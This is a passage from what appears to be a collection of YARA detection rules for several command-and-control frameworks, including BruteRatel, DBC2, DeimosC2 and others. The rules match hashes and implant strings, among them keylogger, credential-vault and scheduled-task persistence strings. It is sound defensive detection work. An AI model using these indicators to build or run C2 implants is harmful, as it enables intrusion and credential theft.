      sha256_1 = "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9"
      sha256_2 = "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511"
   strings:
      $s1  = "QT^%U%" fullword ascii
      $s2  = "nrWLO0J" fullword ascii
      $s3  = "RnPvIe_s" fullword ascii
      $s4  = "aHOcIO0A" fullword ascii
      $s5  = "hIHj\\4" fullword ascii
      $s6  = "TPfI/BA" fullword ascii
      $s7  = "XzJz\"D" fullword ascii
      $s8  = "wUjnc\\" fullword ascii
      $s9  = "yIaAkD{u" fullword ascii
      $s10 = "UtBn_(U&" fullword ascii
      $s11 = "uMeUH}Wc;" fullword ascii
      $s12 = "xRTPi\\" fullword ascii
      $s13 = "1OUhr!!" fullword ascii
      $s14 = "uNrKkND;" fullword ascii
      $s15 = "Lxua?iD" fullword ascii
      $s16 = "rWWKd2Vi" fullword ascii
      $s17 = "5pvQWR4*" fullword ascii
      $s18 = "NgyeM?" fullword ascii
      $s19 = "]xlxA?" fullword ascii
      $s20 = "UEfP<yP" fullword ascii
      $s21 = "- c7;;" fullword ascii
      $s22 = "2%Bm%0" fullword ascii
      $s23 = "P63%]%i~" fullword ascii
      $s24 = "zYvxRjs" fullword ascii
      $s25 = "zhCse%y" fullword ascii
      $s26 = "Ijlb^Ps" fullword ascii
      $s27 = "inYh~q0C" fullword ascii
      $s28 = "raigP]`" fullword ascii
      $s29 = "oIKjIr;_|" fullword ascii
   condition:
      hash.sha256(0, filesize) == "b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9" or
      hash.sha256(0, filesize) == "144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0xe483 and filesize < 600KB and
      8 of them
}

rule BruteRatel_BadgerService_x86 {
   meta:
      description = "BruteRatel - badger_x86_service.exe"
      sha256_1 = "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc"
      sha256_2 = "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4"
   strings:
      $s1  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s2  = "  VirtualQuery failed for %d bytes at address %p" fullword ascii
      $s3  = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." fullword ascii
      $s4  = "Manages universal application core process that in Windows 8 and continues in Windows 10. It is used to determine whether univer" ascii
      $s5  = "  VirtualProtect failed with code 0x%x" fullword ascii
      $s6  = "tion or microphone. It helps to transact records of your universal apps with the trust and privacy settings of user." fullword ascii
      $s7  = "TransactionBrokerService" fullword ascii
      $s8  = "  Unknown pseudo relocation protocol version %d." fullword ascii
      $s9  = "'tSAc?" fullword ascii
      $s10 = "adME<2B" fullword ascii
      $s11 = "EtWnPlR@*" fullword ascii
      $s12 = "xA]%d$" fullword ascii
      $s13 = "bTIlD:L" fullword ascii
      $s14 = "eldi.#]" fullword ascii
      $s15 = "wglk!@" fullword ascii
      $s16 = "WLiF*q:" fullword ascii
      $s17 = "YypyU`C" fullword ascii
      $s18 = ")lXxY| 2" fullword ascii
      $s19 = "ODVYo{# #" fullword ascii
      $s20 = "qWTLG$i" fullword ascii
      $s21 = "}%EP%VJ|D" fullword ascii
      $s22 = "wOCo*.|j\\" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc" or
      hash.sha256(0, filesize) == "385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4" or
      math.entropy(0, filesize) >= 7 and
      pe.imports("kernel32.dll", "GetNativeSystemInfo") and
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("advapi32.dll", "ChangeServiceConfig2A") and
      pe.imports("advapi32.dll", "ChangeServiceConfigA") and
      pe.imports("advapi32.dll", "StartServiceCtrlDispatcherA") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 700KB and
      8 of them
}

rule BruteRatel_BadgerBin_x86_WaitForSingleObject {
   meta:
      description = "BruteRatel - badger_x86_WaitForSingleObject.bin"
      sha256_1 = "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7"
      sha256_2 = "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1"
   strings:
      $s1  = "u.Scg$]" fullword ascii
      $s2  = "VeUye?^(" fullword ascii
      $s3  = "vlHSYN;" fullword ascii
      $s4  = "VcOmK{" fullword ascii
      $s5  = "vKUEFs&" fullword ascii
      $s6  = "{wBwW6)h" fullword ascii
      $s7  = "RfCI\"C" fullword ascii
      $s8  = "XJ\"iFHoMUme6" fullword ascii
      $s9  = "vFarpxD" fullword ascii
      $s10 = "MvNt,OG@" fullword ascii
      $s11 = "DVQhcvq6 (" fullword ascii
      $s12 = "PsBWhs+" fullword ascii
      $s13 = "wU.FbR" fullword ascii
      $s14 = "rhTBPuq." fullword ascii
      $s15 = "mZatBjy" fullword ascii
      $s16 = ";Nzfpr:AP" fullword ascii
      $s17 = "%.Enb{$" fullword ascii
      $s18 = "lXLrko/dVtQ7" fullword ascii
      $s19 = ":(7.TNH" fullword ascii
      $s20 = "KXny@10" fullword ascii
      $s21 = "{Oc.qfy^" fullword ascii
      $s22 = "bqFBo$\\l)" fullword ascii
      $s23 = "SrtTo\"W=" fullword ascii
      $s24 = "ECNRNIMpWE" fullword ascii
      $s25 = "a{ZNYW75:;z" fullword ascii
      $s26 = "jwsW\\_6U" fullword ascii
      $s27 = "HdXdw]m!" fullword ascii
      $s28 = "@WBvXXJ?" fullword ascii
   condition:
      hash.sha256(0, filesize) == "34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7" or
      hash.sha256(0, filesize) == "32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1" or
      math.entropy(0, filesize) >= 7 and
      uint16(0) == 0xe483 and filesize < 600KB and
      8 of them
}

rule BruteRatel_SyscallStageBin_x64_RtlExitUserThread {
   meta:
      description = "BruteRatel - syscall_stage_x64_RtlExitUserThread.bin"
      sha256 = "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca"
   strings:
      $s1  = ":{\"auth\"L" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "AWAVAUATI" fullword ascii
      $s5  = "{\"arch\":UH" fullword ascii
      $s6  = "AUATE1" fullword ascii
      $s7  = "PMch<H" fullword ascii
      $s8  = "McT$<L" fullword ascii
      $s9  = "64,\"cds\"H" fullword ascii
      $s10 = "n.\\d}#l$YH" fullword ascii
      $s11 = { 554889e541574156415541544d89c457 }
      $s12 = { 554889e54157415641554d89c5415457 }
      $s13 = { 554889e55756534889cb4883e4f04881 }
      $s14 = { 554889e541574156415541544989d4ba }
      $s15 = { 554889e5415541545756534883e4f048 }
   condition:
      hash.sha256(0, filesize) == "596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca" or
      uint16(0) == 0x8348 and filesize < 30KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x64_WaitForSingleObject {
   meta:
      description = "BruteRatel - syscall_stage_x64_WaitForSingleObject.bin"
      sha256 = "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384"
   strings:
      $s1  = ":{\"auth\"L" fullword ascii
      $s2  = "AWAVAUATM" fullword ascii
      $s3  = "AWAVAUM" fullword ascii
      $s4  = "AWAVAUATI" fullword ascii
      $s5  = "{\"arch\":UH" fullword ascii
      $s6  = "AUATE1" fullword ascii
      $s7  = "PMch<H" fullword ascii
      $s8  = "McT$<L" fullword ascii
      $s9  = "64,\"cds\"H" fullword ascii
      $s10 = "n.\\d}#l$YH" fullword ascii
      $s11 = { 554889e541574156415541544d89c457 }
      $s12 = { 554889e54157415641554d89c5415457 }
      $s13 = { 554889e55756534889cb4883e4f04881 }
      $s14 = { 554889e541574156415541544989d4ba }
      $s15 = { 554889e5415541545756534883e4f048 }
   condition:
      hash.sha256(0, filesize) == "2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384" or
      uint16(0) == 0x8348 and filesize < 30KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x86_RtlExitUserThread {
   meta:
      description = "BruteRatel - syscall_stage_x86_RtlExitUserThread.bin"
      sha256 = "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9"
   strings:
      $s1  = "D$`POST" fullword ascii
      $s2  = "@h$p<pu" fullword ascii
      $s3  = "D$ich\":" fullword ascii
      $s4  = "D$yuth\"" fullword ascii
      $s5  = "D$m86,\"" fullword ascii
      $s6  = "D$e{\"ar" fullword ascii
      $s7  = "D$\\\"}}" fullword ascii
      $s8  = "D$u:{\"a" fullword ascii
      $s9  = "D$qcds\"" fullword ascii
      $s10 = "n.\\d}#l$YRQ" fullword ascii
      $s11 = { 558b7c2458033b893c24e8970400003b }
   condition:
      hash.sha256(0, filesize) == "2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9" or
      uint16(0) == 0xe483 and filesize < 20KB and
      all of them
}

rule BruteRatel_SyscallStageBin_x86_WaitForSingleObject {
   meta:
      description = "BruteRatel - syscall_stage_x86_WaitForSingleObject.bin"
      sha256 = "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31"
   strings:
      $s1  = "D$`POST" fullword ascii
      $s2  = "@h$p<pu" fullword ascii
      $s3  = "D$ich\":" fullword ascii
      $s4  = "D$yuth\"" fullword ascii
      $s5  = "D$m86,\"" fullword ascii
      $s6  = "D$e{\"ar" fullword ascii
      $s7  = "D$\\\"}}" fullword ascii
      $s8  = "D$u:{\"a" fullword ascii
      $s9  = "D$qcds\"" fullword ascii
      $s10 = "n.\\d}#l$YRQ" fullword ascii
      $s11 = { 558b7c2458033b893c24e8970400003b }
   condition:
      hash.sha256(0, filesize) == "14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31" or
      uint16(0) == 0xe483 and filesize < 20KB and
      all of them
}


- C3 (Custom Command and Control)

import "hash"
import "pe"

rule C3 {
   meta:
      description = "C3 - NodeRelayDll_r64.dll, NodeRelayDll_r86.dll"
      sha256_1 = "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008"
      sha256_2 = "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625"
   strings:
      $s1 = "api-ms-win-core-synch-l1-2-0.dll" fullword wide
      $s2 = "AppPolicyGetProcessTerminationMethod" fullword ascii
      $s3 = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s4 = "[x] error creating Token" fullword ascii
      $s5 = "[x] error setting token" fullword ascii
      $s6 = "AppPolicyGetThreadInitializationType" fullword ascii
      $s7 = "invalid vector subscript" fullword ascii
      $s8 = " Type Descriptor'" fullword ascii
      $s9 = ".?AVfilesystem_error@filesystem@std@@" fullword ascii
      $s10 = "[x] error duplicating token" fullword ascii
      $s11 = "directory_iterator::operator++" fullword ascii
      $s12 = "syntax error " fullword ascii
      $s13 = "operator co_await" fullword ascii
      $s14 = "object key" fullword ascii
      $s15 = "operator<=>" fullword ascii
      $s16 = ".data$rs" fullword ascii
      $s17 = "sysrandom" fullword ascii
      $s18 = "parse error: character [" fullword ascii
      $s19 = "X-Atlassian-Token" fullword ascii
      $s20 = ".?AVparse_error@detail@nlohmann@@" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008" or
      hash.sha256(0, filesize) == "85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625" or
      pe.imports("kernel32.dll", "VirtualProtect") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("advapi32.dll", "DuplicateTokenEx") and
      pe.imports("advapi32.dll", "SystemFunction036") and
      pe.imports("winhttp.dll", "WinHttpConnect") and
      pe.imports("winhttp.dll", "WinHttpCrackUrl") and
      pe.characteristics & pe.DLL and
      ((uint16(0) == 0x5a4d and filesize < 4000KB and (8 of them )) or (all of them))
}


- Callidus

import "hash"
import "pe"

rule Callidus_EXEs {
   meta:
      description = "Callidus - OneNoteC2Client.exe, OutlookC2Client.exe"
      sha256 = "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca"
      sha256 = "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef"
   strings:
      $s1  = "hostfxr.dll" fullword wide
      $s2  = "--- Invoked %s [version: %s, commit hash: %s] main = {" fullword wide
      $s3  = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" fullword wide
      $s4  = "F:\\workspace\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\cli\\apphost\\Release\\apphost.pdb" fullword ascii
      $s5  = "The managed DLL bound to this executable is: '%s'" fullword wide
      $s6  = "A fatal error was encountered. This executable was not bound to load a managed DLL." fullword wide
      $s7  = "Extraction completed by another process, aborting current extraction." fullword wide
      $s8  = "Failed to resolve full path of the current executable [%s]" fullword wide
      $s9  = "Failed to remove temporary file [%s]." fullword wide
      $s10 = "Failed to remove temporary directory [%s]." fullword wide
      $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." fullword wide
      $s12 = "  - Installing .NET Core prerequisites might help resolve this problem." fullword wide
      $s13 = "https://go.microsoft.com/fwlink/?linkid=798306" fullword wide
      $s14 = "Bundle header version compatibility check failed" fullword wide
      $s15 = "I/O failure reading contents of the bundle." fullword wide
      $s16 = "Couldn't open host binary for reading contents" fullword wide
      $s17 = "Failed to load the dll from [%s], HRESULT: 0x%X" fullword wide
      $s18 = "The required library %s does not support relative app dll paths." fullword wide
      $s19 = "Failure processing application bundle; possible file corruption." fullword wide
      $s20 = "Failure processing application bundle." fullword wide
   condition:
      hash.sha256(0, filesize) == "96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca" or
      hash.sha256(0, filesize) == "0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef" or
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "RemoveDirectoryW") and
      pe.imports("kernel32.dll", "TerminateProcess") and
      pe.imports("advapi32.dll", "RegisterEventSourceW") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      ((uint16(0) == 0x5a4d and filesize < 500KB and (8 of them)) or (all of them))
}

rule Callidus_DLLs {
   meta:
      description = "Callidus - OneNoteC2Client.dll, OutlookC2Client.dll"
      sha256_1 = "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904"
      sha256_2 = "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca"
   strings:
      $s1  = "ShellExecuteWithPath" fullword ascii
      $s2  = "<ShellExecuteWithPath>b__1" fullword ascii
      $s3  = "<ShellExecuteWithPath>b__0" fullword ascii
      $s4  = "System.Diagnostics.Process" fullword ascii
      $s5  = "ShellCommand" fullword ascii
      $s6  = "https://graph.microsoft.com/.default" fullword wide
      $s7  = "CallGetWebApiAndProcessResultASync" fullword ascii
      $s8  = "<CallGetWebApiAndProcessResultASync>d__5" fullword ascii
      $s9  = "getuserid" fullword ascii
      $s10 = "<CallGetWebApiAndProcessResultASync>b__5_0" fullword ascii
      $s11 = "CallPostWebApiAndProcessResultASync" fullword ascii
      $s12 = "get_contentType" fullword ascii
      $s13 = "get_content" fullword ascii
      $s14 = "getmessages" fullword ascii
      $s15 = "System.Configuration.ConfigurationManager" fullword ascii
      $s16 = "GetAccountsAsync" fullword ascii
      $s17 = "get_HttpClient" fullword ascii
      $s18 = "CallDeleteWebApiAndProcessResultASync" fullword ascii
      $s19 = "<content>k__BackingField" fullword ascii
      $s20 = "set_UseShellExecute" fullword ascii
   condition:
      hash.sha256(0, filesize) == "066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904" or
      hash.sha256(0, filesize) == "4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca" or
      ((uint16(0) == 0x5a4d and filesize < 80KB and (8 of them)) or (all of them))
}


- DBC2

import "hash"
import "pe"

rule DBC2_Loader {
   meta:
      description = "DBC2 - dbc2Loader.dll"
      sha256 = "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4"
   strings:
      $x1  = "dbc2Loader.dll" fullword wide
      $s2  = "dropboxc2.C2_Agent" fullword wide
      $s3  = "dbc2Loader" fullword ascii
      $s4  = "[ERROR] Missing arguments" fullword wide
      $s5  = "loadDBC2" fullword ascii
      $s6  = "masterKey" fullword ascii
      $s7  = "WebRequest" fullword ascii
      $s8  = "Console" fullword ascii
      $s9  = "source" fullword ascii
      $s10 = "xorKey" fullword ascii
      $s11 = "System.Runtime.CompilerServices" fullword ascii
      $s12 = "System.Reflection" fullword ascii
      $s13 = "System" fullword ascii
   condition:
      hash.sha256(0, filesize) == "045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4" or
      pe.characteristics & pe.DLL and
      uint16(0) == 0x5a4d and filesize < 10KB and
      1 of ($x*) and 4 of them
}

rule DBC2_Agent {
   meta:
      description = "DBC2 - dbc2_agent.exe"
      sha256 = "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b"
   strings:
      $x1  = "ERROR - COULD NOT EXECUTE COMMAND:" fullword wide
      $s2  = "ERROR - Could not send key strokes to the process, probably wrong keystrokes sequence" fullword wide
      $s3  = "ERROR - Could not find a process with name " fullword wide
      $s4  = "https://content.dropboxapi.com/2/files/download" fullword wide
      $s5  = "ERROR - COULD NOT EXECUTE: " fullword wide
      $s6  = "OK - KeyLogger started" fullword wide
      $s7  = "%USERPROFILE%\\AppData\\Local\\WindowsUserLogRotate" fullword wide
      $s8  = "dbc2_agent.exe" fullword wide
      $s9  = "https://content.dropboxapi.com/2/files/upload" fullword wide
      $s10 = "https://api.dropboxapi.com/2/files/get_metadata" fullword wide
      $s11 = "OK - PROCESS STARTED: " fullword wide
      $s12 = "OK - Key strokes sent to process " fullword wide
      $s13 = "OK - Clipboard logger started" fullword wide
      $s14 = "schtasks /create /TN 'WindowsUserLogRotate' /TR '" fullword wide
      $s15 = "https://api.dropboxapi.com/2/files/list_folder" fullword wide
      $s16 = "https://api.dropboxapi.com/2/files/move" fullword wide
      $s17 = "https://api.dropboxapi.com/2/files/delete" fullword wide
      $s18 = "clipboardlogger" fullword wide
      $s19 = "OK - FILE DOWNLOADED AT: " fullword wide
      $s20 = "shellProcess" fullword ascii
   condition:
      hash.sha256(0, filesize) == "ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b" or
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      uint16(0) == 0x5a4d and filesize < 70KB and
      1 of ($x*) and 4 of them
}


- Deimos C2

import "hash"
import "pe"

rule DeimosC2_Win {
   meta:
      description = "DeimosC2 - lsadump.exe, minidump.exe, ntdsdump.exe, samdump.exe, screengrab.exe"
      sha256_1 = "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967"
      sha256_2 = "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e"
      sha256_3 = "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c"
      sha256_4 = "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd"
      sha256_5 = "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3"
   strings:
      $x1  = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" ascii
      $x2  = "tls: client certificate used with invalid signature algorithmtls: server sent a ServerHello extension forbidden in TLS 1.3tls: u" ascii
      $x3  = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " ascii
      $x4  = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" ascii
      $x5  = "runtime: netpoll: PostQueuedCompletionStatus failed (errno= tls: initial handshake had non-empty renegotiation extensiontls: no " ascii
      $x6  = "invalid network interface nameinvalid pointer found on stacklength mismatch in decodeArraylength mismatch in ignoreArraylooking " ascii
      $s7  = "oot of negative numberstream error: stream ID %d; %vsync: inconsistent mutex statesync: unlock of unlocked mutextext/javascript;" ascii
      $s8  = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=proxy-connectionquoted-printablereflect mismatch" ascii
      $s9  = "= flushGen  for type  gfreecnt= pages at  runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen  sweepgen= target" ascii
      $s10 = "y typereflect: Out of non-func type rpc: error executing template:rpc: service already defined: runqputslow: queue is not fullru" ascii
      $s11 = "nt array or slice: length exceeds input size (%d elements)http2: Transport conn %p received error from processing frame %v: %vht" ascii
      $s12 = "pc= throwing= until pc=%!Weekday(%s|%s%s|%s, bound = , limit = /dev/stdin01234567891220703125127.0.0.1:6103515625: parsing :auth" ascii
      $s13 = "[originating from goroutine _html_template_rcdataescaper_html_template_srcsetescaper_html_template_urlnormalizerasn1: string not" ascii
      $s14 = "supported versions satisfy MinVersion and MaxVersionnet/http: invalid Cookie.Domain %q; dropping domain attributerpc.Register: a" ascii
      $s15 = "sched={pc: /* %s */null  but progSize  nmidlelocked= on zero Value out of range  procedure in  to finalizer  untyped args $htmlt" ascii
      $s16 = "internal/poll.(*ioSrv).ExecIO" fullword ascii
      $s17 = "os.Executable" fullword ascii
      $s18 = "rof.dll" fullword ascii
      $s19 = "runtime: GetQueuedCompletionStatus returned invalid mode= tls: server changed cipher suite after a HelloRetryRequesturlPartNoneu" ascii
      $s20 = "i32.dll" fullword ascii
   condition:
      hash.sha256(0, filesize) == "d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967" or
      hash.sha256(0, filesize) == "0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e" or
      hash.sha256(0, filesize) == "195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c" or
      hash.sha256(0, filesize) == "cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd" or
      hash.sha256(0, filesize) == "eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3" or
      pe.imports("kernel32.dll", "DuplicateHandle") and
      pe.imports("kernel32.dll", "SwitchToThread") and
      pe.characteristics & pe.EXECUTABLE_IMAGE and
      (uint16(0) == 0x5a4d and filesize < 22000KB and (1 of ($x*) and 4 of them)) or (all of them)
}

rule DeimosC2_Unix {
   meta:
      description = "DeimosC2 - screengrab.elf, shadowdump.elf"
      sha256_1 = "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050"
      sha256_2 = "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7"
   strings:
      $x1  = "fmt: unknown base; can't happenhttp2: connection error: %v: %vin literal null (expecting 'l')in literal null (expecting 'u')in l" ascii
      $x2  = "bytes.Buffer: reader returned negative count from Readcertificate is not valid for requested server name: %wcryptobyte: Builder " ascii
      $x3  = "59604644775390625: missing method ; SameSite=StrictCOMPRESSION_ERRORCirculateNotify {ConfigureNotify {DiacriticalAcute;Diacritic" ascii
      $x4  = "strings.Builder.Grow: negative countsyntax error scanning complex numbertls: keys must have at least one keytls: server did not " ascii
      $x5  = "adding nil Certificate to CertPoolbad scalar length: %d, expected %dcan't evaluate field %s in type %scan't handle %s for arg of" ascii
      $x6  = "runtime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x] with" ascii
      $x7  = "IDS_Trinary_OperatorInsufficient StorageLeftArrowRightArrow;MAX_HEADER_LIST_SIZEMeroitic_HieroglyphsNegativeMediumSpace;NotGreat" ascii
      $x8  = "s.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrconv: internal error, rest " ascii
      $x9  = "tls: client certificate contains an unsupported public key of type %Ttls: handshake message of length %d bytes exceeds maximum o" ascii
      $x10 = "lock: lock countslice bounds out of rangesocket type not supportedstartm: p has runnable gsstoplockedm: not runnablestrict-trans" ascii
      $x11 = "got CONTINUATION for stream %d; expected stream %dhttp: putIdleConn: CloseIdleConnections was calledhttp: suspiciously long trai" ascii
      $x12 = "%s slice too big: %d elements of %d bytes34694469519536141888238489627838134765625MapIter.Next called on exhausted iteratorTime." ascii
      $x13 = ", RecursionAvailable: .localhost.localdomain/etc/apache/mime.types/etc/ssl/ca-bundle.pem/lib/time/zoneinfo.zip/usr/local/share/c" ascii
      $x14 = "runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: stat underflow: val runtime: sudog with non-nil cruntime: sum" ascii
      $x15 = "173472347597680709441192448139190673828125867361737988403547205962240695953369140625MapIter.Value called on exhausted iteratorPR" ascii
      $x16 = "gob: cannot encode nil pointer of type heapBitsSetTypeGCProg: small allocationhttp: putIdleConn: keep alives disabledinvalid ind" ascii
      $x17 = "HumpEqual;IP addressKeep-AliveKeyPress {KharoshthiLeftArrow;LeftFloor;Leftarrow;LessTilde;ManichaeanMellintrf;Message-IdMinusPlu" ascii
      $x18 = "checkdead: no m for timercontext deadline exceedederror decoding []byte: %sexpected string; found %sexplicit tag has no childhtt" ascii
      $x19 = "template: no template %q associated with template %qtls: received a session ticket with invalid lifetimetls: server selected uns" ascii
      $x20 = "file descriptor in bad statefindrunnable: netpoll with pgcstopm: negative nmspinninggeneral SOCKS server failuregob: cannot enco" ascii
   condition:
      hash.sha256(0, filesize) == "cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050" or
      hash.sha256(0, filesize) == "2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7" or
      uint16(0) == 0x457f and filesize < 23000KB and
      1 of ($x*)
}


- GrimReaper C2

import "hash"
import "pe"

rule GrimReaperC2_Agent {
   meta:
      description = "GrimReaperC2 - Agent_x64.exe, Agent_x86.exe"
      sha256_1 = "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af"
      sha256_2 = "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08"
   strings:
      $s1  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s2  = "    -> CommandId: %u" fullword ascii
      $s3  = "[+] agent is identifying.." fullword ascii
      $s4  = "InternetReadFile Error: (%lu)" fullword ascii
      $s5  = "Error reading file %ld" fullword ascii
      $s6  = "Couldn't get file size" fullword ascii
      $s7  = "[+] Sending %lu bytes: %.*s" fullword ascii
      $s8  = "[+] Got task ID: %u" fullword ascii
      $s9  = "HttpSendRequest Error: (%lu)" fullword ascii
      $s10 = "  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">" fullword ascii
      $s11 = "fetching commands.." fullword ascii
      $s12 = "got token: %s" fullword ascii
      $s13 = "Error writting file." fullword ascii
      $s14 = "Opening file %s for %s" fullword ascii
      $s15 = "writing to file" fullword ascii
      $s16 = "closing file" fullword ascii
      $s17 = "listing files" fullword ascii
      $s18 = "Mozilla/5.0" fullword ascii
      $s19 = "connect" fullword ascii
   condition:
      hash.sha256(0, filesize) == "83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af" or
      hash.sha256(0, filesize) == "b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08" or
      pe.imports("advapi32.dll", "OpenProcessToken") and
      pe.imports("wininet.dll", "InternetConnectW") and
      pe.imports("kernel32.dll", "FindNextFileW") and
      pe.imports("kernel32.dll", "CreateToolhelp32Snapshot") and
      pe.imports("kernel32.dll", "Process32NextW") and
      ((uint16(0) == 0x5a4d and filesize < 60KB and (8 of them)) or (all of them))
}


- FlyingAFalseFlag C2

import "hash"
import "pe"

rule FlyingAFalseFlag_Exchanger {
   meta:
      description = "FlyingAFalseFlag - Exchanger_x64.exe, Exchanger_x86.exe"
      sha256_1 = "6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609"
      sha256_2 = "c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032"
   strings:
      $s1  = "api-ms-win-core-synch-l1-2-0.dll" fullword wide
      $s2  = "<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" fullword ascii
      $s3  = "<DeleteItem DeleteType=\"HardDelete\" xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\">" fullword ascii
      $s4  = "<soap:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:t=" ascii
      $s5  = "://schemas.microsoft.com/exchange/services/2006/types\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\"" ascii
      $s6  = "[+] Found vault creds: %s / " fullword ascii
      $s7  = "[!] Failed to execute tasking" fullword ascii
      $s8  = "        <requestedExecutionLevel level='asInvoker' uiAccess='false' />" fullword ascii
      $s9  = "[+] Auto-hide rule '%s' is ready" fullword ascii
      $s10 = "mail@<domain.com>" fullword ascii
      $s11 = "%localappdata%\\Microsoft\\Outlook\\" fullword wide
      $s12 = "<AutoDiscoverSMTPAddress>" fullword ascii
